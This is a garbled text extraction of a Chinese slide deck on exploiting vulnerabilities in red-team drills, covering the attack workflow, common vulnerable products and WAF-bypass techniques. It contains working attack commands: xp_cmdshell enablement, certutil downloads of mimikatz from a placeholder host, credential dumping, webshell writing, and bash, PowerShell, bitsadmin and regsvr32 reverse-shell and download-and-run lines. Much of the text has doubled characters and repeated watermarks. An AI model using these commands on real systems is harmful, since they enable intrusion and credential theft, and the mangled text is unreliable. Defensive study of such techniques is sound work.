攻防演練中的漏洞利用分享-大余.pdf

《攻防演練中的漏洞利用分享-大余.pdf》由會員分享，可在線閱讀，更多相關《攻防演練中的漏洞利用分享-大余.pdf（51頁珍藏版）》請在三個皮匠報告上搜索。

1、攻攻防防演演練練中中的的漏漏洞洞利利用用分分享享大余安全-dayu大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全攻防演練-攻擊流程介紹0 01 1攻防演練-高頻漏洞0 02 2攻防演練-漏洞利用技巧0 03 3大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全0 01 1 攻攻防防演演練練-攻攻擊擊流流程程介介紹紹大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全信信息息收收集集邊邊界界/P PC C權權限限權權限限提提升升權權限限維維持持匿匿名名隱隱藏藏內內網網滲滲透透痕痕跡跡清清除除通通道道搭搭建建流流量量卡卡、虛虛擬擬

2、機機、代代理理I IP P、臨臨時時郵郵箱箱、臨臨時時短短信信等等目目標標資資產產信信息息搜搜集集的的程程度度，決決定定滲滲透透過過程程的的復復雜雜程程度度。滲滲透透的的本本質質是是信信息息搜搜集集，而而信信息息搜搜集集整整理理為為后后續續的的情情報報跟跟進進提提供供了了強強大大的的保保證證利利用用外外部部站站點點漏漏洞洞打打開開入入口口（高高頻頻漏漏洞洞g ge et ts sh he el ll l）對對內內部部員員工工發發送送釣釣魚魚郵郵件件、社社工工直直接接突突破破邊邊界界L Li in nu ux x提提權權、WWi in nd do owws s提提權權、數數據據庫庫提提權權、第第

3、三三方方軟軟件件提提權權搭搭建建隧隧道道/端端口口轉轉發發，代代理理進進入入目目標標內內網網搭搭建建隧隧道道/端端口口轉轉發發，代代理理進進入入目目標標內內網網內內網網信信息息收收集集、密密碼碼復復用用/密密碼碼噴噴灑灑、內內網網高高頻頻漏漏洞洞、路路徑徑刷刷分分及及控控制制靶靶標標刪刪除除日日志志、木木馬馬及及后后門門文文件件大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全信信息息收收集集貫貫穿穿整整個個攻攻擊擊過過程程，信信息息收收集集的的廣廣度度和和深深度度決決定定了了后后面面持持續續滲滲透透的的攻攻擊擊面面和和攻攻擊擊思思路路大余安全大余安全大余安全大余安全大余

4、安全大余安全大余安全大余安全大余安全信信息息收收集集貫貫穿穿整整個個攻攻擊擊過過程程，信信息息收收集集的的廣廣度度和和深深度度決決定定了了后后面面持持續續滲滲透透的的攻攻擊擊面面和和攻攻擊擊思思路路大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全信信息息收收集集后后漏漏洞洞發發現現與與利利用用，通通過過getshell方方式式獲獲取取入入口口點點初初始始化化權權限限。大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全獲獲得得邊邊界界權權限限（getshell）后后，需需要要對對主主機機提提升升獲獲得得更更多多的的能能動動性性。大余安全大余安全大余安

5、全大余安全大余安全大余安全大余安全大余安全大余安全不不同同網網絡絡環環境境下下選選用用不不同同的的隧隧道道方方式式大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全權權限限維維持持要要點點：多多網網段段、多多位位置置、高高隱隱匿匿、多多類類型型、免免殺殺大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全內內網網滲滲透透過過程程權權限限維維持持很很重重要要，在在橫橫向向移移動動過過程程中中需需要要不不停停進進行行探探測測及及信信息息收收集集，旨旨在在通通過過多多路路徑徑拿拿到到核核心心目目標標的的權權限限大余安全大余安全大余安全大余安全大余安全大余安全

6、大余安全大余安全大余安全1.清除因攻擊操作產生的登錄記錄&操作日志&后門賬號（Web應用&操作系統）2.清除內網系統級預留的控制后門，例如cobalt strike的后門3.清除內網系統級提權的軟件以及創建的后門賬號4.清除內網漏洞掃描及利用的小工具5.清除搭建在外網的隧道橋梁工具6.清除預留在外網的webshell程序等大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全1.員工安全意識淡薄。攻擊者利用綜合釣魚、欺騙、偽裝、跟隨等社工謀略，針對重點崗位人員實施網絡攻擊，與內部人員同工同息，極難發現。2.難以防范0day。零日漏洞武器可以直接撕破防守方的正面防線，大大縮短了

7、攻擊路徑，快速取得戰果，而防守方卻束手無策。3.對1/Nday沒有防范。1day就是剛公布后的漏洞，或者公布后小范圍流傳exp的漏洞。4.互聯網暴露面過大。防守方二級單位的安全防御能力弱，互聯網不收口，引發很多“從地方突入中央，又從中央回打地方”的安全案例。5.弱密碼、密碼通用問題大量存在。業務系統默認口令不修改，弱口令，密碼復用大量存在，密碼文件隨意存放郵箱、終端機、運維機、成為重點攻擊目標。大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全0 02 2 攻攻防防演演練練-高高頻頻漏漏洞洞大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全1 12

8、23 34 45 56 6口口令令：暴力破解、弱口令、默認口令、任意密碼重置 任任意意文文件件上上傳傳漏漏洞洞反反序序列列化化漏漏洞洞：Shiro、Fastjson、Weblogic、Jboss、Websphere遠遠程程代代碼碼執執行行漏漏洞洞：Struts2、Spring Boot Actuators、ThinkPHP 遠遠程程命命令令執執行行漏漏洞洞S SQ QL L注注入入漏漏洞洞、其其他他等等等等大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全暴暴力力破破解解無限制暴力破解圖形驗證碼繞過特殊接口弱弱口口令令Top100定制化口令默默認認口口令令常見默認口令搜索

9、引擎說明文檔客服/售后口口令令獲獲取取/修修改改密碼找回任意密碼重置/修改社會工程學特殊接口泄露密碼大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全應應用用自自實實現現上上傳傳無限制上傳前端javascript限制白名單結合解析/包含第第三三方方編編輯輯器器UEditorFCKeditoreWebEditor中中間間件件控控制制臺臺TomcatWeblogicWebsphereJBoss其其他他致遠htmlofficeservlet 帆軟seeyonreport泛微OA大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全S Sh hi ir ro o

10、Shiro-550Shiro-721F Fa as st tj js so on nFastjson1.2.24Fastjson1.2.47WWe eb bl lo og gi ic cCVE-2015-4852CVE-2017-10271CVE-2019-2729CVE-2020-2551J Jb bo os ss sJMXInvokerServletCVE-2017-12149WWe eb bs sp ph he er re eCVE-2015-7450NCEOSJSF ViewState Exchange其其他他大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全S

11、St tr ru ut ts s2 2S2-016S2-045S2-046S Sp pr ri in ng g B Bo oo ot tActuatorJolokiaH2 databaseT Th hi in nk kP PH HP PThinkPHP 5.x其其他他泛微OA beanshellJeekins大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全運運維維產產品品堡壘機深信服 VPN安安全全產產品品深信服EDR數數據據MSSQLMySQLOracleDB2權權限限MSSQL xp_cmdshellMySQL into outfile大余安全大余安全大余安全大余安

12、全大余安全大余安全大余安全大余安全大余安全信信息息泄泄露露日志文件泄露物理路徑泄露任任意意文文件件讀讀取取讀取配置文件讀取代碼文件權權限限未授權訪問越權S SS SR RF F內網滲透任任意意文文件件包包含含通達OA大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全0 03 3 攻攻防防演演練練-利利用用技技巧巧漏漏洞洞大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全WWA AF F：對對WWE EB B攻攻擊擊流流量量告告警警攔攔截截I IP PS S：入入侵侵檢檢測測E ED DR R：終終端端威威脅脅檢檢測測與與響響應應漏漏洞洞測測試試/攻攻

13、擊擊結結果果無無回回顯顯純純黑黑盒盒測測試試寸寸步步難難行行一一生生之之敵敵冥冥行行盲盲索索東東完完西西缺缺目目標標環環境境不不通通外外網網困困境境離離漏漏洞洞利利用用成成功功似似乎乎僅僅一一步步之之遙遙功功虧虧一一簣簣大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全規規則則特性編碼繞過流量加密靈活語法大小寫繞過關鍵字替換繞過結合應用本身過濾解解析析引引擎擎HPPHTTP Requests Smuggling協議覆蓋不全協議解析錯誤/不支持請求參數100（Nginx+LUA）分塊傳輸畸形數據包（multipart）其其他他白名單防護站點覆蓋不全超長數據包繞過獲取真實IP

14、（云WAF）語法覆蓋不全（語義識別）大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 WEB服務映射到互聯網 WEB應用存在SQL注入漏洞 WEB應用存在文件上傳功能，白名單檢驗 SQL注入為SA權限，支持堆疊查詢 站庫分離 數據庫服務器不通外網目標：建立代理，進行內網滲透大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 上傳圖片后綴的mimikatz、wmiexec 啟用xp_cmdshell#EXEC sp_configure show advanced options,1;RECONFIGURE;#EXEC sp_configure xp_

15、cmdshell,1;RECONFIGURE;執行certutils下載mimikatz、wmiexec到數據庫服務器#EXEC master.xp_cmdshell certutil-urlcache-split-f http:/xxx/m.jpg C:WindowsTempm.exe;#EXEC master.xp_cmdshell certutil-urlcache-split-f http:/xxx/w.jpg C:WindowsTempw.exe;運行mimikatz獲取數據庫服務器密碼#EXEC master.xp_cmdshell C:WindowsTempm.exe privi

16、lege:debug log sekurlsa:logonpasswords full exit C:WindowsTempresult;#CREATE TABLE tmp(v varchar(8000);#INSERT INTO tmp(v)EXEC master.xp_cmdshell type C:WindowsTempresult;#UNION ALL SELECT NULL,v,NULL FROM tmp;大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 口令同用，wmiexec橫向移動攻擊WEB服務器 執行遠程命令定位WEB應用路徑#INSERT INTO

17、tmp(v)EXEC master.xp_cmdshell C:WindowsTempw.exe user:pass192.168.31.191 for/r d:%i in(check.js*)do echo%i;#UNION ALL SELECT NULL,v,NULL FROM tmp;寫入webshell及reGeorg到WEB應用路徑#EXEC master.xp_cmdshell C:WindowsTempw.exe user:pass192.168.31.191 echo code_here D:webjsimage.aspx;內網滲透 大余安全大余安全大余安全大余安全大余安全大余

18、安全大余安全大余安全大余安全O OO OB B將結果通過DNS或者HTTP等協議帶出不適用場景：服務器不能出網時時間間延延遲遲通過構造時間延遲盲打獲取結果定定位位WWE EB B目目錄錄寫寫文文件件通過搜索靜態資源等文件定位WEB目錄，然后寫入結果文件或者webshell不適用場景：URL白名單、獨立運行jar包、需登錄才能訪問獲獲取取s sh he el ll l通過反彈或者下載執行C2等獲取shell不適用場景：服務器不能出網構構造造回回顯顯&內內存存wwe eb bs sh he el ll l構造回顯通過構造報錯、中間件、框架回顯等獲取回顯；動態注冊filter或servlet等寫入無

19、文件webshell大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 Linux（ping/curl/wget）#ping #wget http:/ Windows（ping/certutil/bitsadmin）#for/f%i in(whoami)do certutil-urlcache-split-f http:/ c:%i in(check.js*)do certutil-urlcache-split-f http:/ OO OB B將結果通過DNS或者HTTP等協議帶出不適用場景：服務器不能出網定定位位WWE EB B目目錄錄寫寫文文件件通過搜索靜態資源等文件

20、定位WEB目錄，然后寫入結果文件或者webshell不適用場景：URL白名單、獨立運行jar包、需登錄才能訪問時時間間延延遲遲通過構造時間延遲盲打獲取結果構構造造回回顯顯&內內存存wwe eb bs sh he el ll l構造回顯通過構造報錯、中間件、框架回顯等獲取回顯；動態注冊filter或servlet等寫入無文件webshell獲獲取取s sh he el ll l通過反彈或者下載執行C2等獲取shell不適用場景：服務器不能出網大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 Linux#find/|grep check.js|while read f;do

21、 sh-c whoami$(dirname$f)/test.txt;done Windows#for/r D:%i in(test.css*)do whoami%i/./test.txt大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全CVE-2019-2725#find/-type d-name bea_wls9_async_response|while read f;do find$f-type d-name war;done|while read ff;do echo$ff$ff/test.txt;done大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余

22、安全大余安全 獲取async路徑，再結合CVE-2019-2725、CVE-2019-2618寫入webshell大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全CVE-2019-2618寫入webshell大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全O OO OB B將結果通過DNS或者HTTP等協議帶出不適用場景：服務器不能出網定定位位WWE EB B目目錄錄寫寫文文件件通過搜索靜態資源等文件定位WEB目錄，然后寫入結果文件或者webshell不適用場景：URL白名單、獨立運行jar包、需登錄才能訪問獲獲取取s sh he el ll l

23、通過反彈或者下載執行C2等獲取shell不適用場景：服務器不能出網構構造造回回顯顯&內內存存wwe eb bs sh he el ll l構造回顯通過構造報錯、中間件、框架回顯等獲取回顯；動態注冊filter或servlet等寫入無文件webshell時時間間延延遲遲通過構造時間延遲盲打獲取結果大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 Linux（bash、python、perl反彈）#bash i&/dev/tcp/IP/PORT 0&1 Windows（powershell、certutil、bitsadmin、regsvr32）#powershell-no

24、p-w hidden-c IEX(new-objectnet.webclient).downloadstring(http:/x.x.x.x/p)#certutil-urlcache-split-f http:/x.x.x.x/test.exe C:WindowsTemptest.exe&C:WindowsTemptest.exe#bitsadmin/transfer n http:/x.x.x.x/test.exe C:WindowsTemptest.exe&C:WindowsTemptest.exe#regsvr32/s/n/u/i:http:/x.x.x.x/r scrobj.dll大余

25、安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全O OO OB B將結果通過DNS或者HTTP等協議帶出不適用場景：服務器不能出網定定位位WWE EB B目目錄錄寫寫文文件件通過搜索靜態資源等文件定位WEB目錄，然后寫入結果文件或者webshell不適用場景：URL白名單、獨立運行jar包、需登錄才能訪問獲獲取取s sh he el ll l通過反彈或者下載執行C2等獲取shell不適用場景：服務器不能出網構構造造回回顯顯&內內存存wwe eb bs sh he el ll l構造回顯通過構造報錯、中間件、框架回顯等獲取回顯；動態注冊filter或servlet等寫入無文件

26、webshell時時間間延延遲遲通過構造時間延遲盲打獲取結果大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全Tomcat 7.0.106Tomcat 8.5.56 借助java-object-searcher挖掘Tomcat 7、8、9回顯 通過反射從線程對象Thread開始搜索到Request對象 Tomcat 7、8、9實現略有不同 a.運行模式（BIO/NIO）b.可搜索到Request對象的線程對象 c.定義Field的類 d.org.apache.coyote.Response#doWrite()傳參類型ByteChunk/ByteBufferTomcat 9

27、.0.19大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全 Servlet規范 -Servlet -Filter -Listener 框架 -Spring MVC Java Instrumentation -Agent 大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全場景一：Tomcat+Fastjson1.2.24 允許DNS出網 操作系統為Windows以前的解決思路：獲取WEB目錄 寫入webshe

28、ll大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全場景二：Tomcat+Fastjson1.2.24 服務器不通網 操作系統為Windows以前的解決思路：時間延遲二分法獲取WEB目錄 寫入webshell大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全現在的解決思路：直接寫內存webshell大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全O OO OB B將結果通過DNS或者HTTP等協議帶出不適用場景：服務器不能出網定定位位WWE EB B目目錄錄寫寫文文件件通過搜索靜態資源等文件定位WEB目錄，然后寫入結果文件或

29、者webshell不適用場景：URL白名單、獨立運行jar包、需登錄才能訪問獲獲取取s sh he el ll l通過反彈或者下載執行C2等獲取shell不適用場景：服務器不能出網構構造造回回顯顯&內內存存wwe eb bs sh he el ll l構造回顯通過構造報錯、中間件、框架回顯等獲取回顯；動態注冊filter或servlet等寫入無文件webshell時時間間延延遲遲通過構造時間延遲盲打獲取結果大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全擴展ysoserial，加入時間延遲Gadgets.createTemplatesImplTime其它大余安全大余安全

30、大余安全大余安全大余安全大余安全大余安全大余安全大余安全 python shiro_exp.py java-jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1_Time 5000|base64大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全Shiro反序列化漏洞檢測請求添加Cookie:rememberMe=checka.響應頭Set-Cookie包含rememberMe=deleteMe為Shirob.否則不存在Shiro構造繼承PrincipalCollection的對象a.當Key正確時，不返回rememb

31、erMe=deleteMeb.當Key不正確時，返回rememberMe=deleteMe使用較通用的時間延遲檢測減少因不出網等情況的影響考慮目標依賴的jar版本和ysoserial payload依賴版本不同導致反序列化失敗考慮Tomcat下對于Lmons.collections.Transformer數組類加載失敗問題大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全參考sqlmap時間盲注檢測思路lowerStdLimit=average(responseTimes)+TIME_STDEV_COEFF*deviationTIME_STDEV_COEFF=7大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全T T H H A A N N K K S S大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全大余安全